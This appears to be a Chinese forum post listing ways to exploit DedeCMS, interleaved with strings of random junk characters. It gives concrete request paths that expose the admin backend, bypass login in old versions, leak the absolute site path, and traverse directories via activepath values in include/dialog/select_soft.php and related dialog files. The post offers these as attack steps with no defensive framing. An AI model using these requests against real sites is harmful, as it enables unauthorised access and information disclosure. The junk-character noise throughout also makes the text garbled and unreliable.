1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
2 U2 R- @" ^9 \) `+ z8 K# t" h7 w" N4 W3 q% \5 y
员帐号,新版本的就直接转向了后台.2 Y+ f( O4 l8 b3 {& {
3 g: Y6 b5 s+ Q) F2.include/dialog/config.php会爆出后台管理路径. p% M- C$ M3 R8 W. v% q
3 n# Q) y1 D+ v. f$ ] ^" W3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
k6 Y0 J7 U/ X [7 r7 e m
0 J4 i v8 S9 p3 m% _3 K4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.; c: [/ i" ]! a8 \" A! L' U1 k
, e5 N3 _2 y7 j Z6 n( v! B
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉5 t9 B: G& _! r; t& g; ^* r) Q0 _% I
6 l) i4 ^2 u& o/ T到根目录去.不过这些版本的访问地址有些不同.: L u) r& a/ Y1 d0 {$ N( {& F' @% c6 @5 D
地址为require/dialog/select_soft.php?activepath=/././././././././
5 e0 n! R; k! R; N0 ]
5 N9 D0 C1 ~' U: Pinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
. V6 e' ` Q; f- @$ M- Q存在相同问题的文件还有
; n, _5 e+ ~; M/ v' Einclude\dialog\select_images.php
. ? @0 X% Y' j; {+ `include\dialog\select_media.php* _/ n) ` i/ X5 w
include\dialog\select_templets.php- l3 z" [3 V7 D) P8 I7 `
|